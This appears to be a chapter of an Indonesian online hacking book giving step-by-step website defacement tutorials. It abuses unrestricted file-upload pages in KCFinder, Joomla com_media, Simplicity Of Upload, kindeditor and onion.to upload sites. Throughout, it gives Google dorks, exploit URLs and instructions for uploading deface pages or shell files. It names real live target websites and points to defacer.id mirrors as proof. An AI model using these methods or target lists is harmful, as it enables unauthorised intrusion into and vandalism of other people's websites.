Method/metode KCFinder
Inurl:/kcfinder/browse.php
Inurl:/Kcfinder/
Langsung saja upload file deface anda,lalu panggil dengan tambahan
/file/namasckamu.html
Contoh:
https://basukiwater.com/kcfinder/browse.php
jadi
https://basukiwater.com/file/namasckamu.html
cara3
Deface Onion.to File Upload
Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake
Deepweb hehehe... Mari kita Lanjut...
Dork : - inurl:/upload site:.onion.to
- intext:"Upload" site:.onion.to
Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php
Step By Step :
1. Dorking Dulu
2. Pilih Web Target
3. Pilih File yang mau di'upload
4. Tinggal klik Upload => Done
Contoh Target :
https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html
https://danwin1210.me/uploads/lopeyou.html
https://temp.xn--wda.fr/e719x8JgJ.html
Mirror?!
https://www.defacer.id/296011.html
https://www.defacer.id/296024.html
cara4
Metode com media
Bahan :
1. Dork : - inurl:com_media site:com
- inurl:com_media intext:"Upload"
2. Exploit : /index.
php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articl
etext&asset=com_content&author=&folder=
3. Upload'an : Format .txt
Live Target : http://www.james-insurance.co.uk/
Step by Step :
gunakan Live Targert dulu untuk Uji Coba
1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk
2. Pilih salah satu Web
3. Masukkan Exploit
http://www.james-insurance.co.uk/index.
php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articl
etext&asset=com_content&author=&folder=
4. Lalu Upload file dalam tempat upload ( format .txt )
Akses shell ?
Tambahkan : /images/namafile.txt
contoh : http://www.james-insurance.co.uk/images/fac.txt
Nanti Jadi Gini Hasilnyaa..
Mudah Bukan?! Tinggal Upload ke Defacer.id
cara5
[POC] Vulnerability Simplicity Of Upload
#Step 1:
Dork: “Powered By: © Simplicity oF Upload”
#Step 2:
Exploit: http://[situstargetkamu]/PATH/upload.php
*Tergantung dengan target.
#Step 3:
llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html)
#Step 4:
Preview: http://[situstargetkamu]/upload/[Your File]
#Step 5: Live Demo:
http://www.railfaneurope.net/pix/upload.php
http://www.formplas.com/upload/upload.php
*Di google masih banyak kok
Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya.
Kalau masih ada yang bingung ? komen aja, nanti langsung saya bales
Keep spirit brothers
Home: http://www.fikrifakhrezy.com/
FB: https://www.facebook.com/fikri.badboy
Twitter: https://www.twitter.com/fikri_badboy
Deface Methode File Upload
TUTORIAL
DORK : inurl:/examples/uploadbutton.html
1. Pastekan Dork Di google
2. Pilih Salah Satu Site Misal Saya Pilih Paling atas
3. Setelah di buka Tampilan akan seperti ini kemudian pilih upload lalu pilis script yang
mau di upload
4. Setelah Memilih otomatis akan muncul link di samping tombol upload copy linknya
(ctrl + a)
5. pastekan link yang kita dapat di belakang url web tsb misal www.dgmotor.
com/Public/Plug/kindeditor-4.1.4/attached/file/20170818/20170818163648_24620.
html
6. Dan Bisa Kita Lihat Hasilnya
7. Kalau kita pengen memperlihatkan ke orang lain bisa copy link di atasnya
KAMU SEDANG MEMBACA
BUKU SAKTI HACKERS
AdventureHacker adalah orang yang mempelajari, menganalisis, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan. adapun tujuan kami membuat buku ini agar dijadikan sesuai hal yang semes...